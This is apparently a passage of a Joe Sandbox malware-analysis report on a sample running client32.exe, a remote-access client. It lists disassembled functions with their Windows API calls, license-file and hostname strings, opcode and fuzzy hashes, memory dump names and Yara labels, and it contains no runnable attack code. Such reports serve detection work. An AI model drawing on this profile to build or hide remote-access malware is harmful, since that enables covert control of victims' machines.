                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _free$ErrorFreeHeapLastLocinfo::_Locinfo_dtor_setlocalestd::_
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3515823920-0
                                                                                                                                                                                                    • Opcode ID: 62c2770954d93fd006766d5ae319b04a53202b929f467d8ce75b2ef83ed42ad2
                                                                                                                                                                                                    • Instruction ID: 6354e4c6b4ea18464702b145c06536eed7bcdebf3ca81661a54f05b51a131181
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 62c2770954d93fd006766d5ae319b04a53202b929f467d8ce75b2ef83ed42ad2
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1E11E2B1D00A559BE7A0CF99C840A0BFBFDEB41614F144A2AE426D3740E731F9048B92
                                                                                                                                                                                                    Function 11141F80 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 51COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 11141240: GetModuleFileNameA.KERNEL32(00000000,?,00000104,?), ref: 111412AD
                                                                                                                                                                                                      • Part of subcall function 11141240: SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,?), ref: 111412EE
                                                                                                                                                                                                      • Part of subcall function 11141240: SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 1114134B
                                                                                                                                                                                                    • wsprintfA.USER32 ref: 11141FAE
                                                                                                                                                                                                    • wsprintfA.USER32 ref: 11141FC4
                                                                                                                                                                                                      • Part of subcall function 1113F8A0: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,75BF8400,?), ref: 1113F937
                                                                                                                                                                                                      • Part of subcall function 1113F8A0: CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 1113F957
                                                                                                                                                                                                      • Part of subcall function 1113F8A0: CloseHandle.KERNEL32(00000000), ref: 1113F95F
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: File$CreateFolderPathwsprintf$CloseHandleModuleName
                                                                                                                                                                                                    • String ID: %sNSA.LIC$%sNSM.LIC$NSM.LIC
                                                                                                                                                                                                    • API String ID: 3779116287-2600120591
                                                                                                                                                                                                    • Opcode ID: 4e6b941dd91801a2435b4bb47ef9bd529b47744a684cc276ea5b71ac848a70c8
                                                                                                                                                                                                    • Instruction ID: b8eec695178ba2d1a937c5ef531141e0e56104a00a3206b9e8423c5fe1c12a7b
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4e6b941dd91801a2435b4bb47ef9bd529b47744a684cc276ea5b71ac848a70c8
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9001D4B9E0122D66DB50DBB09D41FEBF7ACCB44608F1001E5ED0997181EE31BA448B95
                                                                                                                                                                                                    Function 1113F8A0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 92fileCOMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,75BF8400,?), ref: 1113F937
                                                                                                                                                                                                    • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 1113F957
                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 1113F95F
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CreateFile$CloseHandle
                                                                                                                                                                                                    • String ID: "
                                                                                                                                                                                                    • API String ID: 1443461169-123907689
                                                                                                                                                                                                    • Opcode ID: a2a77767078ddfce535248fde987ff7f5033cfdc2bfe7a17f5ba387350ad47bd
                                                                                                                                                                                                    • Instruction ID: 9c86450901ac288abfb1a5416e129d0f3cdd4120216def2344b537bfb16cbc1a
                                                                                                                                                                                                    • Opcode Fuzzy Hash: a2a77767078ddfce535248fde987ff7f5033cfdc2bfe7a17f5ba387350ad47bd
                                                                                                                                                                                                    • Instruction Fuzzy Hash: F421BE30A0426AAFE312CE38DD54BD9BB949F82324F2041E4F9D5DB1C8EA719A488752
                                                                                                                                                                                                    Function 68596610 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84networkCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 685A9BF0: _strncpy.LIBCMT ref: 685A9C14
                                                                                                                                                                                                    • inet_addr.WSOCK32(?,?,?,?,?,?,00002000,?,00000000), ref: 68596691
                                                                                                                                                                                                    • gethostbyname.WSOCK32(?,?,?,?,?,?,00002000,?,00000000), ref: 685966A2
                                                                                                                                                                                                    • WSAGetLastError.WSOCK32(?,?,?,?,?,?,00002000,?,00000000), ref: 685966CD
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • Cannot resolve hostname %s, error %d, xrefs: 685966D6
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4097286216.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097266710.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097320746.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097341613.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097364193.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097364193.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097405518.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ErrorLast_strncpygethostbynameinet_addr
                                                                                                                                                                                                    • String ID: Cannot resolve hostname %s, error %d
                                                                                                                                                                                                    • API String ID: 2603238076-1802540647
                                                                                                                                                                                                    • Opcode ID: ac746b96797c9f2c88474287111a265455a07addd814ddf11fcf3f1dffda775e
                                                                                                                                                                                                    • Instruction ID: 8ee86666c36afe0e9ec017191a216632d1fe139ab56e6a3bb53b3a1890622fb9
                                                                                                                                                                                                    • Opcode Fuzzy Hash: ac746b96797c9f2c88474287111a265455a07addd814ddf11fcf3f1dffda775e
                                                                                                                                                                                                    • Instruction Fuzzy Hash: DB219435A402189BDB10DA64DC50BAAB3F8BF98254F808599E919D7280EF31AD44CBA1
                                                                                                                                                                                                    Function 11026E20 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 53windowCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 11026E4A
                                                                                                                                                                                                      • Part of subcall function 110CBDD0: EnterCriticalSection.KERNEL32(00000000,00000000,75C0A1D0,75BF3760,75BF7A80,110F2499,?,?,?,?,?,?,?,?,110FFF09), ref: 110CBDEB
                                                                                                                                                                                                      • Part of subcall function 110CBDD0: SendMessageA.USER32(00000000,00000476,00000000,00000000), ref: 110CBE18
                                                                                                                                                                                                      • Part of subcall function 110CBDD0: SendMessageA.USER32(00000000,00000475,00000000,?), ref: 110CBE2A
                                                                                                                                                                                                      • Part of subcall function 110CBDD0: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,110FFF09), ref: 110CBE34
                                                                                                                                                                                                    • TranslateMessage.USER32(?), ref: 11026E60
                                                                                                                                                                                                    • DispatchMessageA.USER32(?), ref: 11026E66
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Message$CriticalSectionSend$DispatchEnterLeaveTranslate
                                                                                                                                                                                                    • String ID: Exit Msgloop, quit=%d
                                                                                                                                                                                                    • API String ID: 3212272093-2210386016
                                                                                                                                                                                                    • Opcode ID: e7dd9a0d6304e414837417c1496cf95b9c492c7d0ab5e24ee8a9f5cb138c621a
                                                                                                                                                                                                    • Instruction ID: e73fb029a48cead8081619cba9071100042b7f6ca482b6c8c9150014965f5db6
                                                                                                                                                                                                    • Opcode Fuzzy Hash: e7dd9a0d6304e414837417c1496cf95b9c492c7d0ab5e24ee8a9f5cb138c621a
                                                                                                                                                                                                    • Instruction Fuzzy Hash: A001D476E0125E66EB12DBF5DC81F6FB7AD5B84718F904075EF1493189FB60B00487A2
                                                                                                                                                                                                    Function 1110C420 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 40COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • wsprintfA.USER32 ref: 1110C454
                                                                                                                                                                                                      • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                                                                                      • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                                                                                      • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                                                                                      • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                                                                                    • _memset.LIBCMT ref: 1110C477
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: wsprintf$ErrorExitLastMessageProcess_memset
                                                                                                                                                                                                    • String ID: ..\ctl32\Refcount.cpp$Can't alloc %u bytes
                                                                                                                                                                                                    • API String ID: 1322847840-2664294811
                                                                                                                                                                                                    • Opcode ID: 3a706ac0cd119f38acec977a3592e350be6868ab0f23c6a029c7efd4c141a840
                                                                                                                                                                                                    • Instruction ID: 8eb050f01703c0127fa8cf99996688d7a4adf3630a2635e654b6d504aebe3ff0
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3a706ac0cd119f38acec977a3592e350be6868ab0f23c6a029c7efd4c141a840
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 67F0FCB5D0113867C6119EA9AD41FAFF77C9F81604F0001A9FF04A7241D6346A01C7D5
                                                                                                                                                                                                    Function 11017610 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 1101761D
                                                                                                                                                                                                      • Part of subcall function 11017520: WaitForSingleObject.KERNEL32(000002F0,000000FF), ref: 1101755C
                                                                                                                                                                                                      • Part of subcall function 11017520: CoInitialize.OLE32(00000000), ref: 11017565
                                                                                                                                                                                                      • Part of subcall function 11017520: CoUninitialize.COMBASE(00000001,?,?), ref: 110175F0
                                                                                                                                                                                                      • Part of subcall function 11017440: WaitForSingleObject.KERNEL32(000002F0,000000FF), ref: 11017472
                                                                                                                                                                                                      • Part of subcall function 11017440: CoInitialize.OLE32(00000000), ref: 1101747B
                                                                                                                                                                                                      • Part of subcall function 11017440: CoUninitialize.COMBASE(00000001,?,?), ref: 11017500
                                                                                                                                                                                                    • SetEvent.KERNEL32(000002F0), ref: 1101763D
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 11017643
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • touchkbd, systype=%d, chassis=%d, took %d ms, xrefs: 1101764D
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CountInitializeObjectSingleTickUninitializeWait$Event
                                                                                                                                                                                                    • String ID: touchkbd, systype=%d, chassis=%d, took %d ms
                                                                                                                                                                                                    • API String ID: 3357037191-4122679463
                                                                                                                                                                                                    • Opcode ID: 6fb4c883c76aea1f2d5b3d6f188dc251cbcdc853b11f71871790596908a8fc6c
                                                                                                                                                                                                    • Instruction ID: 79165456b83758217f0e3ba606bc8870e55e265f2da5a0662fe20fec16fd047e
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6fb4c883c76aea1f2d5b3d6f188dc251cbcdc853b11f71871790596908a8fc6c
                                                                                                                                                                                                    • Instruction Fuzzy Hash: B4F0A0B2E00218ABD700EBF99C89EAEBB9CDB4431CB100076F904C7245E9A2BD1047B2
                                                                                                                                                                                                    Function 68594FB0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32libraryloaderCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 68594FC4
                                                                                                                                                                                                    • K32EnumProcessModules.KERNEL32(00000FA0,?,00000000,68598E0D,00000000,?,68598E0D,00000000,?,00000FA0,?), ref: 68594FE4
                                                                                                                                                                                                    • SetLastError.KERNEL32(00000078,00000000,?,68598E0D,00000000,?,00000FA0,?), ref: 68594FED
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4097286216.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097266710.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097320746.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097341613.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097364193.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097364193.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097405518.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AddressEnumErrorLastModulesProcProcess
                                                                                                                                                                                                    • String ID: EnumProcessModules
                                                                                                                                                                                                    • API String ID: 3858832252-3735562946
                                                                                                                                                                                                    • Opcode ID: 64f2bf0c1ee8cb5c044a969f9cad62c9aaf79525f1ba8bba44fefbd38ddb7876
                                                                                                                                                                                                    • Instruction ID: c6008895448c7ea24cf5e3f5aa5c2c106650779afcf18f2532c2e3569412b958
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 64f2bf0c1ee8cb5c044a969f9cad62c9aaf79525f1ba8bba44fefbd38ddb7876
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 41F08C72650218AFCB20DFA8D844E9B77A8EB48721F40C81AFD6AD7740C670EC10CFA0
                                                                                                                                                                                                    Function 68595000 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32libraryloaderCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,GetModuleFileNameExA), ref: 68595014
                                                                                                                                                                                                    • K32GetModuleFileNameExA.KERNEL32(00000FA0,?,00000000,00000104,00000000,?,68598E50,00000000,?,?,00000104,00000000,?,00000FA0,?), ref: 68595034
                                                                                                                                                                                                    • SetLastError.KERNEL32(00000078,00000000,?,68598E50,00000000,?,?,00000104,00000000,?,00000FA0,?), ref: 6859503D
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4097286216.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097266710.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097320746.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097341613.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097364193.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097364193.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097405518.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                                                                                                    Yara matches
